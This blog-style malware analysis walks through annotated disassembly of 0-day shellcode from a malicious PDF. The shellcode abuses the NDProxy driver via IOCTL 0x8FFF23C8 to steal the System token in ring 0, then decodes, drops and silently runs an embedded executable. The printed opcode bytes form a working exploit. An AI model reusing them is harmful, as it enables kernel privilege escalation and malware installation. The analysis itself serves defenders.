The Shellcode Used in the latest Zero Day Attack Analysis (CVE-2013-5065&CVE-2013-3346)

Now I show the shellcode and explain what it does.
It is a cool thing to analyze the 0-day attack sample.

00401000 > $  E8 00000000   call    00401005
00401005   $  5D            pop     ebp
00401006   .  83ED 05       sub     ebp, 5   // get the base addr.
00401009   .  E9 8B000000   jmp     00401099
0040100E  /$  52            push    edx
0040100F  |.  50            push    eax
00401010  |.  31D2          xor     edx, edx
00401012  |>  31C0          /xor     eax, eax // hash loop: cl == 1 reads UTF-16 (word) characters, otherwise bytes
00401014  |.  80F9 01       |cmp     cl, 1
00401017  |.  75 04         |jnz     short 0040101D
00401019  |.  66:AD         |lods    word ptr [esi]
0040101B  |.  EB 01         |jmp     short 0040101E
0040101D  |>  AC            |lods    byte ptr [esi]
0040101E  |>  3C 00         |cmp     al, 0
00401020  |.  74 0D         |je      short 0040102F
00401022  |.  3C 61         |cmp     al, 61
00401024  |.  72 02         |jb      short 00401028
00401026  |.  2C 20         |sub     al, 20
00401028  |>  C1CA 0D       |ror     edx, 0D
0040102B  |.  01C2          |add     edx, eax           hash = ror(hash, 0D) + (al >= 61 ? al - 20 : al)   // bytes >= 'a' are folded down by 0x20, so lower-case names hash like upper-case
0040102D  |.^ EB E3         \jmp     short 00401012     //
0040102F  |>  39DA          cmp     edx, ebx // ZF = (hash == target in ebx); the pops below leave the flags alone, so callers test the result with jnz
00401031  |.  58            pop     eax
00401032  |.  5A            pop     edx
00401033  \.  C3            retn
00401034  /$  56            push    esi // resolve exports by hash: ebx = module base, esi -> table of hashes, ecx = count; each slot is overwritten with the export address
00401035  |.  89DA          mov     edx, ebx
00401037  |.  B2 3C         mov     dl, 3C // base + 0x3C = IMAGE_DOS_HEADER.e_lfanew
00401039  |.  31C0          xor     eax, eax
0040103B  |.  66:8B02       mov     ax, word ptr [edx]
0040103E  |.  01D8          add     eax, ebx
00401040  |.  8B50 78       mov     edx, dword ptr [eax+78] // PE header + 0x78 = export directory RVA (DataDirectory[0])
00401043  |.  01DA          add     edx, ebx
00401045  |>  52            /push    edx
00401046  |.  51            |push    ecx
00401047  |.  8B4A 18       |mov     ecx, dword ptr [edx+18] // NumberOfNames
0040104A  |.  8B42 20       |mov     eax, dword ptr [edx+20] // AddressOfNames
0040104D  |.  01D8          |add     eax, ebx
0040104F  |>  8B38          |/mov     edi, dword ptr [eax]
00401051  |.  01DF          ||add     edi, ebx
00401053  |.  53            ||push    ebx
00401054  |.  8B1E          ||mov     ebx, dword ptr [esi]
00401056  |.  87F7          ||xchg    edi, esi
00401058  |.  51            ||push    ecx
00401059  |.  31C9          ||xor     ecx, ecx
0040105B  |.  E8 AEFFFFFF   ||call    0040100E
00401060  |.  59            ||pop     ecx
00401061  |.  5B            ||pop     ebx
00401062  |.  87F7          ||xchg    edi, esi
00401064  |.  75 02         ||jnz     short 00401068
00401066  |.  EB 08         ||jmp     short 00401070
00401068  |>  83C0 04       ||add     eax, 4
0040106B  |.  49            ||dec     ecx
0040106C  |.  E3 22         ||jecxz   short 00401090
0040106E  |.^ EB DF         |\jmp     short 0040104F
00401070  |>  8B42 18       |mov     eax, dword ptr [edx+18] // NumberOfNames ...
00401073  |.  29C8          |sub     eax, ecx // ... minus the names still unchecked = index of the matching name
00401075  |.  89C1          |mov     ecx, eax
00401077  |.  8B42 24       |mov     eax, dword ptr [edx+24] // AddressOfNameOrdinals
0040107A  |.  01D8          |add     eax, ebx
0040107C  |.  66:8B0C48     |mov     cx, word ptr [eax+ecx*2]
00401080  |.  8B42 1C       |mov     eax, dword ptr [edx+1C] // AddressOfFunctions
00401083  |.  01D8          |add     eax, ebx
00401085  |.  C1E1 02       |shl     ecx, 2
00401088  |.  01C8          |add     eax, ecx
0040108A  |.  8B00          |mov     eax, dword ptr [eax]
0040108C  |.  01D8          |add     eax, ebx
0040108E  |.  8906          |mov     dword ptr [esi], eax // replace the hash in the table with the resolved address
00401090  |>  59            |pop     ecx
00401091  |.  5A            |pop     edx
00401092  |.  83C6 04       |add     esi, 4
00401095  |.^ E2 AE         \loopd   short 00401045 // next hash; ecx = count supplied by the caller
00401097  |.  5E            pop     esi
00401098  \.  C3            retn
00401099   >  31D2          xor     edx, edx
0040109B   .  64:8B52 30    mov     edx, dword ptr fs:[edx+30] // edx = PEB
0040109F   .  8B52 0C       mov     edx, dword ptr [edx+C] // PEB.Ldr
004010A2   .  8B52 14       mov     edx, dword ptr [edx+14] // Ldr.InMemoryOrderModuleList.Flink
004010A5   .  B1 01         mov     cl, 1 // hash routine reads UTF-16: BaseDllName is a UNICODE_STRING
004010A7   >  8B72 28       mov     esi, dword ptr [edx+28] // BaseDllName.Buffer of the current module (offsets are relative to InMemoryOrderLinks)
004010AA   .  BB 17CA2B6E   mov     ebx, 6E2BCA17 // target hash: the kernel32.dll name
004010AF   .  E8 5AFFFFFF   call    0040100E // hash the module name and compare it with ebx (sets ZF)
004010B4   .  8B5A 10       mov     ebx, dword ptr [edx+10] // DllBase of this module (kept as the module base if it matched)
004010B7   .  8B12          mov     edx, dword ptr [edx] // Flink: next module
004010B9   .^ 75 EC         jnz     short 004010A7 // no match: try the next module (mov does not touch the flags)
004010BB   .  31C9          xor     ecx, ecx // ebx = kernel32.dll base
004010BD   .  B1 0E         mov     cl, 0E // 14 hashes follow
// API name hashes, pushed so that once resolved [esi] = ExitProcess, [esi+4] = VirtualAlloc, ... [esi+34] = SetFilePointer
004010BF   .  68 7CFA9615   push    1596FA7C //SetFilePointer
004010C4   .  68 E65C780F   push    0F785CE6 //ReadFile
004010C9   .  68 7D93FABD   push    BDFA937D //GetFileSize
004010CE   .  68 2096EA95   push    95EA9620 //GetTempFileNameA
004010D3   .  68 1BBE091A   push    1A09BE1B //GetTempPathA
004010D8   .  68 DA8B7AAE   push    AE7A8BDA //CloseHandle
004010DD   .  68 EF6C88E6   push    E6886CEF //WriteFile
004010E2   .  68 68F6880D   push    0D88F668 //WinExec
004010E7   .  68 76468B8A   push    8A8B4676 //LoadLibraryA
004010EC   .  68 CA6A2A95   push    952A6ACA //GetCurrentProcessId
004010F1   .  68 950B7F1A   push    1A7F0B95 //CreateFileA
004010F6   .  68 453C9E57   push    579E3C45 //DeviceIoControl
004010FB   .  68 1CBE2E30   push    302EBE1C //VirtualAlloc
00401100   .  68 4ECCDF12   push    12DFCC4E //ExitProcess
00401105   .  89E6          mov     esi, esp // esi -> the 14 hash slots on the stack
00401107   .  E8 28FFFFFF   call    00401034 // resolve them: each slot now holds the function address (ExitProcess at [esi] ... SetFilePointer at [esi+34])
0040110C   .  8DBD 0E040000 lea     edi, dword ptr [ebp+40E] // edi -> the 12 encoded bytes at 0040140E
00401112   .  6A 0C         push    0C
00401114   .  59            pop     ecx // ecx = 12
00401115   >  8037 C8       xor     byte ptr [edi], 0C8
00401118   .  47            inc     edi
00401119   .^ E2 FA         loopd   short 00401115 // XOR-decode with 0xC8: the bytes become "\\.\NDProxy" plus a NUL terminator
0040111B   .  6A 6C         push    6C // "l\0\0\0"
0040111D   .  68 6E74646C   push    6C64746E // "ntdl" -> the stack now holds "ntdll"
00401122   .  54            push    esp
00401123   .  FF56 14       call    dword ptr [esi+14] //LoadLibraryA("ntdll")
00401126   .  83F8 00       cmp     eax, 0 // eax = ntdll base, 0 on failure
00401129   .  0F84 D4010000 je      00401303
0040112F   .  56            push    esi // save the kernel32 function table
00401130   .  31C9          xor     ecx, ecx
00401132   .  41            inc     ecx // one hash to resolve
00401133   .  89C3          mov     ebx, eax // ebx = ntdll base
00401135   .  68 91FD4759   push    5947FD91 //ZwAllocateVirtualMemory
0040113A   .  89E6          mov     esi, esp
0040113C   .  E8 F3FEFFFF   call    00401034 // [esi] = address of ZwAllocateVirtualMemory
00401141   .  6A 01         push    1 // BaseAddress = 1 (rounds down to page 0)
00401143   .  89E7          mov     edi, esp // edi = &BaseAddress
00401145   .  68 00200000   push    2000 // RegionSize = 0x2000
0040114A   .  89E1          mov     ecx, esp // ecx = &RegionSize
0040114C   .  6A 40         push    40 // Protect = PAGE_EXECUTE_READWRITE
0040114E   .  68 00301000   push    103000 // AllocationType = MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN
00401153   .  51            push    ecx
00401154   .  6A 00         push    0 // ZeroBits
00401156   .  57            push    edi
00401157   .  6A FF         push    -1 // ProcessHandle = current process
00401159   .  FF16          call    dword ptr [esi] // ZwAllocateVirtualMemory
NTSTATUS ZwAllocateVirtualMemory(
  _In_     HANDLE ProcessHandle,
  _Inout_  PVOID *BaseAddress,
  _In_     ULONG_PTR ZeroBits,
  _Inout_  PSIZE_T RegionSize,
  _In_     ULONG AllocationType,
  _In_     ULONG Protect
);

ZwAllocateVirtualMemory(
    -1 /* current process */, &base /* = 1, rounds down to page 0 */, 0, &size /* 0x2000 */,
    0x00103000 /* MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN */, 0x40 /* PAGE_EXECUTE_READWRITE */
)

0040115B   .  59            pop     ecx // RegionSize (as updated by the call)
0040115C   .  59            pop     ecx // ecx = BaseAddress as returned by the kernel (0)
0040115D   .  5E            pop     esi // discard the hash slot
0040115E   .  5E            pop     esi // esi = kernel32 function table again
0040115F   .  83F8 00       cmp     eax, 0
00401162   .  0F85 9B010000 jnz     00401303 // NTSTATUS != 0: the allocation failed, bail out
00401168   .  B0 90         mov     al, 90
0040116A   .  FC            cld
0040116B   .  89CF          mov     edi, ecx
0040116D   .  B9 F50E0000   mov     ecx, 0EF5
00401172   .  F3:AA         rep     stos byte ptr es:[edi] //
{
fill 0x0EF5 bytes at 00000000 with 0x90 (a NOP sled); edi ends up at 00000EF5
}
00401174   .  56            push    esi
00401175   .  B9 0B010000   mov     ecx, 10B
0040117A   .  8DB5 03030000 lea     esi, dword ptr [ebp+303]
00401180   .  F3:A4         rep     movs byte ptr es:[edi], byte ptr>
{
copy the 0x10B-byte ring-0 stage at 00401303 (ebp+0x303) to 00000EF5, right after the NOP sled;
esi is saved and restored around the copy so it still points at the function table afterwards
}
00401182   .  5E            pop     esi
00401183   .  FF56 10       call    dword ptr [esi+10] //GetCurrentProcessId()
00401186   .  8907          mov     dword ptr [edi], eax // store the PID at 00001000 (= stage base + 0x10B); the ring-0 stage reads it back at 004013CF
00401188   .  8D85 0E040000 lea     eax, dword ptr [ebp+40E] // eax -> the decoded "\\.\NDProxy" string
0040118E   .  6A 00         push    0
00401190   .  6A 00         push    0
00401192   .  6A 03         push    3
00401194   .  6A 00         push    0
00401196   .  6A 00         push    0
00401198   .  6A 00         push    0
0040119A   .  50            push    eax
0040119B   .  FF56 0C       call    dword ptr [esi+C] //call CreateFileA
{
CreateFileA("\\.\NDProxy" /* decoded above */, 0, 0, NULL, OPEN_EXISTING /* 3 */, 0, NULL);
}
0040119E   .  83F8 00       cmp     eax, 0 // note: CreateFileA signals failure with INVALID_HANDLE_VALUE (-1), not 0, so this check never catches a failed open
004011A1   .  0F84 5C010000 je      00401303
004011A7   .  89C7          mov     edi, eax
004011A9   .  6A 04         push    4
004011AB   .  68 00100000   push    1000
004011B0   .  68 00040000   push    400
004011B5   .  6A 00         push    0
004011B7   .  FF56 04       call    dword ptr [esi+4]//call VirtualAlloc
{
VirtualAlloc(NULL, 0x400, MEM_COMMIT /* 0x1000 */, PAGE_READWRITE /* 4 */);
}
004011BA   .  83F8 00       cmp     eax, 0
004011BD   .  0F84 40010000 je      00401303
// fill the IOCTL input buffer (offsets below are hex); these are the fields the driver reads
004011C3   .  C740 14 25010>mov     dword ptr [eax+14], 7030125
004011CA   .  C740 1C AD000>mov     dword ptr [eax+1C], 0AD
004011D1   .  C740 2C 20000>mov     dword ptr [eax+2C], 20
004011D8   .  C740 30 04000>mov     dword ptr [eax+30], 4
004011DF   .  C740 38 EFBEA>mov     dword ptr [eax+38], DEADBEEF
{
heap_buffer[14] = 0x7030125;
heap_buffer[1c] = 0xad;
heap_buffer[2c] = 0x20;
heap_buffer[30] = 4;
heap_buffer[38] = 0xdeadbeef; 
}
004011E6   .  6A 00         push    0
004011E8   .  89E2          mov     edx, esp
004011EA   .  6A 00         push    0
004011EC   .  52            push    edx
004011ED   .  68 80000000   push    80
004011F2   .  50            push    eax
004011F3   .  68 00040000   push    400
004011F8   .  50            push    eax
004011F9   .  68 C823FF8F   push    8FFF23C8
004011FE   .  57            push    edi
004011FF   .  FF56 08       call    dword ptr [esi+8]
{
DeviceIoControl(hNDProxy /* edi, the handle itself */, 0x8FFF23C8, buf, 0x400, buf, 0x80, &bytesReturned, NULL)
// this IOCTL is the trigger: the stage copied to the NULL page above runs in ring 0 inside this call
}
00401202   .  31DB          xor     ebx, ebx // ebx = candidate handle value, stepped by 4 below
00401204   .  55            push    ebp // save the shellcode base (ebp is reused for the file size at 0040122D)
00401205   .  52            push    edx
00401206   .  89E7          mov     edi, esp // edi -> 4-byte read buffer
00401208   .  52            push    edx // slot for the bytes-read count
00401209   >  83C3 04       add     ebx, 4 // next handle value: 4, 8, 0xC, ...
0040120C   .  31C0          xor     eax, eax
0040120E   .  50            push    eax // dwMoveMethod = FILE_BEGIN
0040120F   .  50            push    eax // lpDistanceToMoveHigh = NULL
00401210   .  50            push    eax // lDistanceToMove = 0
00401211   .  53            push    ebx // hFile
00401212   .  FF56 34       call    dword ptr [esi+34] // SetFilePointer(ebx, 0, NULL, FILE_BEGIN)
{
// probe handle values 4, 8, 0xC, ...: SetFilePointer returns -1 (INVALID_SET_FILE_POINTER) unless the value is an open file handle
SetFilePointer(ebx, 0, NULL, FILE_BEGIN)
// the aim is to find the handle of the PDF the reader already has open (checked for "%PDF" below) and rewind it
}
00401215   .  83F8 FF       cmp     eax, -1 // not an open file handle
00401218   .^ 74 EF         je      short 00401209 // try the next value
0040121A   .  31C0          xor     eax, eax
0040121C   .  50            push    eax // lpFileSizeHigh = NULL
0040121D   .  53            push    ebx
0040121E   .  FF56 2C       call    dword ptr [esi+2C] // GetFileSize(ebx, NULL)
{
GetFileSize(ebx, NULL);
}
00401221   .  83F8 FF       cmp     eax, -1 // INVALID_FILE_SIZE
00401224   .^ 74 E3         je      short 00401209
00401226   .  3D 00100000   cmp     eax, 1000
0040122B   .^ 7C DC         jl      short 00401209 // signed compare: sizes below 0x1000 are skipped
{
if (file_size == INVALID_FILE_SIZE /* -1 */ || (int)file_size < 0x1000) continue;   // next handle
}
0040122D   .  89C5          mov     ebp, eax
0040122F   .  89E0          mov     eax, esp
00401231   .  31C9          xor     ecx, ecx
00401233   .  51            push    ecx
00401234   .  50            push    eax
00401235   .  6A 04         push    4
00401237   .  57            push    edi
00401238   .  53            push    ebx
00401239   .  FF56 30       call    dword ptr [esi+30] // ReadFile(h, edi_buf, 4, &read, NULL): first 4 bytes of the candidate file (its pointer was rewound above)
0040123C   .  813F 25504446 cmp     dword ptr [edi], 46445025 // "%PDF" as a little-endian dword
00401242   .^ 75 C5         jnz     short 00401209 // not a PDF: try the next handle
00401244   .  83C4 08       add     esp, 8 // drop the read buffer and count slots
00401247   .  89EF          mov     edi, ebp // edi = file size (ebp was reused for it at 0040122D)
00401249   .  5D            pop     ebp // restore the shellcode base
0040124A   .  83EF 04       sub     edi, 4 // bytes left after "%PDF"
0040124D   .  6A 04         push    4
0040124F   .  68 00100000   push    1000
00401254   .  57            push    edi
00401255   .  6A 00         push    0
00401257   .  FF56 04       call    dword ptr [esi+4] //VirtualAlloc
{
VirtualAlloc(NULL, filesize - 4 /* edi is the remaining size, not an address */, MEM_COMMIT, PAGE_READWRITE);
}
0040125A   .  31C9          xor     ecx, ecx
0040125C   .  50            push    eax
0040125D   .  51            push    ecx
0040125E   .  54            push    esp
0040125F   .  57            push    edi
00401260   .  50            push    eax
00401261   .  53            push    ebx
00401262   .  FF56 30       call    dword ptr [esi+30] // ReadFile(h, buf, filesize - 4, &read, NULL): the rest of the PDF after "%PDF"

00401265   .  58            pop     eax
00401266   .  89F9          mov     ecx, edi
00401268   .  31D2          xor     edx, edx
0040126A   >  80FA 01       cmp     dl, 1 // dl = 1 once the marker has been found
0040126D   .  74 11         je      short 00401280
0040126F   .  8138 F209090A cmp     dword ptr [eax], 0A0909F2 // marker bytes F2 09 09 0A that start the encoded payload (inside obj 4 of the PDF)
00401275   .  75 1E         jnz     short 00401295 // not yet: next byte
00401277   .  83C0 04       add     eax, 4 // skip the 4 marker bytes
{ // marker found: eax -> first payload byte, ebx = bytes remaining at the marker, so ebx - edi is the offset into the payload (dl = 1 from here on)
0040127A   .  FEC2          inc     dl
0040127C   .  50            push    eax
0040127D   .  89FB          mov     ebx, edi
0040127F   .  57            push    edi
00401280   >  56            push    esi
00401281   .  52            push    edx
00401282   .  50            push    eax
00401283   .  89C6          mov     esi, eax
00401285   .  89DA          mov     edx, ebx
00401287   .  29FA          sub     edx, edi
00401289   .  89D0          mov     eax, edx
0040128B   .  F6E2          mul     dl
ax = al * dl, where both al and dl hold the low byte of the offset (ebx - edi): al = (offset * offset) & 0xFF
0040128D   .  2806          sub     byte ptr [esi], al
0040128F   .  8036 F3       xor     byte ptr [esi], 0F3

byte[esi] = (byte[esi] - al) ^ 0xF3   // decoded in place

00401292   .  58            pop     eax
00401293   .  5A            pop     edx
00401294   .  5E            pop     esi
00401295   >  40            inc     eax
00401296   .  4F            dec     edi
00401297   .^ E2 D1         loopd   short 0040126A //
// after the loop the payload following the marker is decoded in place: the malicious exe file. The pushes at 0040127C/0040127F left its pointer and length on the stack.

00401299   .  5F            pop     edi
0040129A   .  58            pop     eax
0040129B   .  81EC C8000000 sub     esp, 0C8 // 0xC8-byte path buffer
004012A1   .  89E3          mov     ebx, esp // ebx -> path buffer
004012A3   .  83EC 0C       sub     esp, 0C // 12 spare bytes below the path, 8 of which receive the "cmd /c  " prefix at 004012BE
004012A6   .  50            push    eax // save the payload pointer
004012A7   .  53            push    ebx
004012A8   .  68 C8000000   push    0C8
004012AD   .  FF56 24       call    dword ptr [esi+24] // GetTempPathA(0xC8, path)
004012B0   .  8D43 FC       lea     eax, dword ptr [ebx-4] // eax -> the 4 bytes just below the path
004012B3   .  31C9          xor     ecx, ecx
004012B5   .  8908          mov     dword ptr [eax], ecx // empty prefix string ""
004012B7   .  53            push    ebx
004012B8   .  51            push    ecx
004012B9   .  50            push    eax
004012BA   .  53            push    ebx
004012BB   .  FF56 28       call    dword ptr [esi+28] // GetTempFileNameA(path, "", 0, path): a unique temp file name written over the path buffer

004012BE   .  C743 FC 2F632>mov     dword ptr [ebx-4], 2020632F // "/c  "
004012C5   .  C743 F8 636D6>mov     dword ptr [ebx-8], 20646D63 // "cmd " -> the 8 bytes before the path now read "cmd /c  <temp file>", one string starting at ebx-8
004012CC   .  58            pop     eax // payload pointer saved at 004012A6
004012CD   .  89C5          mov     ebp, eax // ebp = payload (the shellcode base is no longer needed)
004012CF   .  31C9          xor     ecx, ecx
004012D1   .  51            push    ecx
004012D2   .  51            push    ecx
004012D3   .  6A 02         push    2
004012D5   .  51            push    ecx
004012D6   .  51            push    ecx
004012D7   .  68 00000040   push    40000000
004012DC   .  53            push    ebx
004012DD   .  FF56 0C       call    dword ptr [esi+C] //CreateFileA(tempname, GENERIC_WRITE /* 0x40000000 */, 0, NULL, CREATE_ALWAYS /* 2 */, 0, NULL)

004012E0   .  83EB 08       sub     ebx, 8 // ebx -> "cmd /c  <temp file>"
004012E3   .  53            push    ebx // save the command line
004012E4   .  89C3          mov     ebx, eax // ebx = file handle
004012E6   .  31C9          xor     ecx, ecx
004012E8   .  51            push    ecx
004012E9   .  89E0          mov     eax, esp
004012EB   .  51            push    ecx
004012EC   .  50            push    eax
004012ED   .  57            push    edi
004012EE   .  55            push    ebp
004012EF   .  53            push    ebx
004012F0   .  FF56 1C       call    dword ptr [esi+1C] //WriteFile(h, ebp = payload, edi = length, &written, NULL)
004012F3   .  53            push    ebx
004012F4   .  FF56 20       call    dword ptr [esi+20] //CloseHandle(h)
004012F7   .  58            pop     eax // bytes-written slot
004012F8   .  5B            pop     ebx // ebx -> "cmd /c  <temp file>"
004012F9   .  31C0          xor     eax, eax
004012FB   .  6A 00         push    0 // uCmdShow = SW_HIDE
004012FD   .  53            push    ebx
004012FE   .  FF56 18       call    dword ptr [esi+18] //WinExec("cmd /c  <temp file>", SW_HIDE): runs the dropped file
00401301   .  FF16          call    dword ptr [esi] // ExitProcess
-----
The following 0x10B bytes are the stage that was copied to the NULL page (00000EF5) at 00401180; they run in ring 0 when the vulnerable NDProxy path reached through the IOCTL above transfers control into that page.
--begin
00401303   >  60            pushad                 // ring-0 entry (the user-mode error paths above also jump here)
00401304   .  E8 00000000   call    00401309
00401309   $  5B            pop     ebx
0040130A   .  83EB 06       sub     ebx, 6 // ebx = base of this stage (00000EF5 when running from the NULL page)
0040130D   .  8B4D 00       mov     ecx, dword ptr [ebp] // ebp is whatever frame the kernel caller left: presumably [ebp] = its saved ebp ...
00401310   .  8B49 04       mov     ecx, dword ptr [ecx+4] // ... and [that+4] = a return address inside a kernel image
00401313   .  81E1 00F0FFFF and     ecx, FFFFF000 // page-align it
00401319   >  66:8139 4D5A  cmp     word ptr [ecx], 5A4D // scan downwards page by page for an "MZ" header
0040131E   .  0F84 93000000 je      004013B7 // found: ecx = base of that kernel image (presumably ntoskrnl)
00401324   .  81E9 00100000 sub     ecx, 1000
0040132A   .^ EB ED         jmp     short 00401319
0040132C  /$  52            push    edx // identical copy of the hash routine at 0040100E, so the stage is self-contained on the NULL page
0040132D  |.  50            push    eax
0040132E  |.  31D2          xor     edx, edx
00401330  |>  31C0          /xor     eax, eax
00401332  |.  80F9 01       |cmp     cl, 1
00401335  |.  75 04         |jnz     short 0040133B
00401337  |.  66:AD         |lods    word ptr [esi]
00401339  |.  EB 01         |jmp     short 0040133C
0040133B  |>  AC            |lods    byte ptr [esi]
0040133C  |>  3C 00         |cmp     al, 0
0040133E  |.  74 0D         |je      short 0040134D
00401340  |.  3C 61         |cmp     al, 61
00401342  |.  72 02         |jb      short 00401346
00401344  |.  2C 20         |sub     al, 20
00401346  |>  C1CA 0D       |ror     edx, 0D
00401349  |.  01C2          |add     edx, eax
0040134B  |.^ EB E3         \jmp     short 00401330
0040134D  |>  39DA          cmp     edx, ebx
0040134F  |.  58            pop     eax
00401350  |.  5A            pop     edx
00401351  \.  C3            retn
00401352  /$  56            push    esi // identical copy of the export resolver at 00401034 (walks the export table of the image at ebx)
00401353  |.  89DA          mov     edx, ebx
00401355  |.  B2 3C         mov     dl, 3C
00401357  |.  31C0          xor     eax, eax
00401359  |.  66:8B02       mov     ax, word ptr [edx]
0040135C  |.  01D8          add     eax, ebx
0040135E  |.  8B50 78       mov     edx, dword ptr [eax+78]
00401361  |.  01DA          add     edx, ebx
00401363  |>  52            /push    edx
00401364  |.  51            |push    ecx
00401365  |.  8B4A 18       |mov     ecx, dword ptr [edx+18]
00401368  |.  8B42 20       |mov     eax, dword ptr [edx+20]
0040136B  |.  01D8          |add     eax, ebx
0040136D  |>  8B38          |/mov     edi, dword ptr [eax]
0040136F  |.  01DF          ||add     edi, ebx
00401371  |.  53            ||push    ebx
00401372  |.  8B1E          ||mov     ebx, dword ptr [esi]
00401374  |.  87F7          ||xchg    edi, esi
00401376  |.  51            ||push    ecx
00401377  |.  31C9          ||xor     ecx, ecx
00401379  |.  E8 AEFFFFFF   ||call    0040132C
0040137E  |.  59            ||pop     ecx
0040137F  |.  5B            ||pop     ebx
00401380  |.  87F7          ||xchg    edi, esi
00401382  |.  75 02         ||jnz     short 00401386
00401384  |.  EB 08         ||jmp     short 0040138E
00401386  |>  83C0 04       ||add     eax, 4
00401389  |.  49            ||dec     ecx
0040138A  |.  E3 22         ||jecxz   short 004013AE
0040138C  |.^ EB DF         |\jmp     short 0040136D
0040138E  |>  8B42 18       |mov     eax, dword ptr [edx+18]
00401391  |.  29C8          |sub     eax, ecx
00401393  |.  89C1          |mov     ecx, eax
00401395  |.  8B42 24       |mov     eax, dword ptr [edx+24]
00401398  |.  01D8          |add     eax, ebx
0040139A  |.  66:8B0C48     |mov     cx, word ptr [eax+ecx*2]
0040139E  |.  8B42 1C       |mov     eax, dword ptr [edx+1C]
004013A1  |.  01D8          |add     eax, ebx
004013A3  |.  C1E1 02       |shl     ecx, 2
004013A6  |.  01C8          |add     eax, ecx
004013A8  |.  8B00          |mov     eax, dword ptr [eax]
004013AA  |.  01D8          |add     eax, ebx
004013AC  |.  8906          |mov     dword ptr [esi], eax
004013AE  |>  59            |pop     ecx
004013AF  |.  5A            |pop     edx
004013B0  |.  83C6 04       |add     esi, 4
004013B3  |.^ E2 AE         \loopd   short 00401363
004013B5  |.  5E            pop     esi
004013B6  \.  C3            retn
004013B7   >  89DD          mov     ebp, ebx // ebp = stage base
004013B9   .  89CB          mov     ebx, ecx // ebx = kernel image base
004013BB   .  31C9          xor     ecx, ecx
004013BD   .  41            inc     ecx // one hash to resolve
004013BE   .  68 74C9AC4A   push    4AACC974 // hash of the kernel export used below (not named on this page)
004013C3   .  89E6          mov     esi, esp
004013C5   .  E8 88FFFFFF   call    00401352 // [esi] = resolved kernel function
004013CA   .  6A 00         push    0 // output slot
004013CC   .  89E7          mov     edi, esp // edi = &slot
004013CE   .  57            push    edi
004013CF   .  8B85 0B010000 mov     eax, dword ptr [ebp+10B] // the PID that the user-mode code stored at 00001000 (00401186)
004013D5   .  50            push    eax
004013D6   .  FF16          call    dword ptr [esi] // func(pid, &slot): judging from its use, a by-PID lookup of our own process
004013D8   .  5F            pop     edi // edi = object returned for our process
004013D9   .  83F8 00       cmp     eax, 0
004013DC   .  75 26         jnz     short 00401404 // non-zero status: give up
004013DE   .  6A 00         push    0
004013E0   .  89E0          mov     eax, esp
004013E2   .  50            push    eax
004013E3   .  6A 04         push    4 // PID 4 = System
004013E5   .  FF16          call    dword ptr [esi] // func(4, &slot)
004013E7   .  5E            pop     esi // esi = object returned for System (the function table is no longer needed)
004013E8   .  83F8 00       cmp     eax, 0
004013EB   .  75 17         jnz     short 00401404
004013ED   .  81C6 C8000000 add     esi, 0C8
004013F3   .  81C7 C8000000 add     edi, 0C8
004013F9   .  8B06          mov     eax, dword ptr [esi]
004013FB   .  8907          mov     dword ptr [edi], eax // copy the dword at +0xC8 of the System object into ours -- on 32-bit XP/2003 that is EPROCESS.Token, i.e. the classic token swap; confirm against the target build
004013FD   .  C747 6C 00000>mov     dword ptr [edi+6C], 0 // and zero the dword at +0x134 of our object (purpose not established here)
00401404   >  58            pop     eax // discard the function-address slot pushed at 004013BE
00401405   .  61            popad
00401406   .  B8 01010000   mov     eax, 101
0040140B   .  C2 0400       retn    4 // back to the kernel caller with eax = 0x101, popping one argument
--end
------
{ // encoded data, XOR-decoded in place with 0xC8 by the loop at 00401115
  // decoded: "\\.\NDProxy" followed by a NUL terminator (C8 ^ C8 = 00)
0040140E      94            db      94
0040140F      94            db      94
00401410      E6            db      E6
00401411      94            db      94
00401412      86            db      86
00401413      8C            db      8C
00401414      98            db      98
00401415      BA            db      BA
00401416      A7            db      A7
00401417      B0            db      B0
00401418      B1            db      B1
00401419      C8            db      C8
}

  1. ringz3r0 2013/12/09 pm 5:43

    你是怎么获得这些poc的呀?

